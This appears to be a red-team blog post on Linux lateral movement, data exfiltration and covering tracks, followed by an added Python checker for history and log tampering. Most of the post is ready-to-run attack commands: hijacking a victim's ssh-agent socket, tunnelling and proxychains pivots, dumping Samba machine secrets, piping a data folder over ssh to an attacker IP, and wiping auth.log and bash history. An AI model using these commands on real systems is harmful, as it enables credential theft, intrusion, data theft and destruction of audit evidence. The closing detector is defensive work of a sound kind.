Linux Lateral Movement And Exfiltration.
Introduction
In this blog post we will discuss Linux lateral movement, data exfiltration, and covering tracks.
Lateral Movement
It is a technique for moving around a network in search of data or assets to exfiltrate, and for gaining access to multiple target assets.
SSH Hijacking
For this method to be successful, the compromised machine should have an active SSH session established to another machine via Public Key Authentication.
# Attacker finds the SSHd process of the victim
ps uax|grep sshd
# Attacker looks for the SSH_AUTH_SOCK on victim's environment variables
grep SSH_AUTH_SOCK /proc/<pid>/environ
# Attacker hijacks the victim's ssh-agent socket
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l
# Attacker can log in to remote systems as the victim
ssh remote_system -l victim
SSH Tunneling
It is used to forward ports from the attacker's machine so that internal assets can be reached.
Local port forwarding of port 8080 through an SSH tunnel from the attacker's session to another machine:
sudo ssh -L 127.0.0.1:8080:192.168.1.118:8080 user@<targetIP>
Remote port forwarding: port 8080 on the target is forwarded to port 443 on the attacker's machine:
sudo ssh -R8080:127.0.0.1:443 user@<targetip>
sshuttle is an alternative to SSH tunneling:
https://github.com/sshuttle/sshuttle
Proxy chaining
proxychains - redirect connections through proxy servers
To configure ProxyChains, edit the main configuration file (/etc/proxychains.conf) and add our SOCKS4 proxy to it by appending the following line:
socks4 127.0.0.1 1337
ssh -D1337 root@2.2.2.2 (For dynamic tunneling)
In a separate terminal run:
proxychains nmap -A -p- <10.10.10.139>
You will then be able to run nmap through proxychains to scan any internal host. Proxychains tunneling is used this way to discover internal hosts, their services, and internal networks.
VPNPivot
VPN Pivot sends and receives a fully encrypted TCP/IP stack over a TCP stream socket; the peers then forward it to the desired device/host. The attacker explores the internal network as if he belonged to it, using a local IP address taken from the DHCP server or statically configured.
Installation
# git clone https://github.com/0x36/VPNPivot.git
cd VPNPivot
./autogen.sh
./configure
make && make install
Usage:
./src/pivotc <server IP> <server port> <locale IP> [MTU]
The options are :
server IP: the IP address of the server (pivots)
server port: the port which the server is listening on
locale IP: the IP address of the network interface connected to the unreachable network.
MTU: the MTU is optional unless you changed it in pivots
Samba system secrets to take over domain admin
tdbdump /var/lib/samba/private/secrets.tdb
If we obtain the NTLM hash of any machine in the domain, we can compromise it using the pass-the-hash technique.
I will explain pass the hash in the upcoming blog post.
Data Exfiltration
Exfiltration is moving sensitive data off the target machine; possessing that data demonstrates the severity of the compromise.
There are many techniques to move data from the target machine to the attacker's machine.
**Using SSH**
Start an nc listener on the attacker machine:
nc -nlvp 80 > Targetdata.tmp
On the target machine:
tar zcf - /tmp/datafolder | ssh root@<attackerIP> "cd /tmp; tar zxpf -"
Cover tracks
Washing your hands after committing the sin.
Clear auth.log file
echo "" > /var/log/auth.log
Clear current user bash history
echo "" > ~/.bash_history
Delete .bash_history file
rm -rf ~/.bash_history
Clear current session history
history -c
Set history max lines to 0
export HISTFILESIZE=0
Set history max commands to 0
export HISTSIZE=0
To kill current session
kill -9 $$
To permanently send all bash history commands to /dev/null
ln -sf /dev/null ~/.bash_history
There are many other techniques as well; look them up yourself and keep practising.
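A defender-side check for the traces these commands leave behind, added here as an example and not part of the original post: it audits a home directory for a .bash_history linked to /dev/null or emptied, and for rc files that set HISTSIZE or HISTFILESIZE to 0, and it flags an auth.log that has been truncated. The host layout it inspects is a constructed fixture built in a temporary directory.

```python
import os
import re
import tempfile
from pathlib import Path

# Matches `HISTSIZE=0` or `export HISTFILESIZE=0` on its own line in a shell rc file.
DISABLE_HISTORY = re.compile(r"^\s*(?:export\s+)?HIST(?:FILE)?SIZE\s*=\s*0\s*$", re.M)

def audit_home(home: Path) -> list[str]:
    """Return the anti-forensics indicators found in one user's home directory."""
    findings = []
    hist = home / ".bash_history"
    if hist.is_symlink():
        if os.readlink(hist) == "/dev/null":
            findings.append(".bash_history -> /dev/null")
    elif hist.exists() and hist.stat().st_size == 0:
        findings.append(".bash_history is empty")
    for rc in (".bashrc", ".bash_profile", ".profile"):
        path = home / rc
        if path.is_file() and DISABLE_HISTORY.search(path.read_text()):
            findings.append(f"{rc} sets history size to 0")
    return findings

def audit_auth_log(log: Path) -> list[str]:
    """Flag an auth.log that is missing or holds nothing but a newline."""
    if not log.exists():
        return ["auth.log missing"]
    if log.stat().st_size <= 1:  # `echo "" > auth.log` leaves exactly one newline
        return ["auth.log truncated"]
    return []

def demo() -> dict[str, list[str]]:
    """Build a constructed fixture that looks like a 'cleaned' host, then audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        home = root / "home" / "victim"          # constructed, not a real account
        home.mkdir(parents=True)
        (home / ".bashrc").write_text("export HISTSIZE=0\nexport HISTFILESIZE=0\n")
        os.symlink("/dev/null", home / ".bash_history")
        log = root / "var" / "log" / "auth.log"
        log.parent.mkdir(parents=True)
        log.write_text("\n")                     # result of `echo "" > /var/log/auth.log`
        return {"home": audit_home(home), "auth.log": audit_auth_log(log)}

if __name__ == "__main__":
    for area, hits in demo().items():
        print(area, "->", hits or "clean")
```

On a real host, point audit_home at each directory under /home (and /root) and audit_auth_log at /var/log/auth.log; a clean system returns empty lists for both.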
Conclusion
In this blog post we discussed some lateral movement and data exfiltration techniques; we will discuss persistence in an upcoming post in the red team series.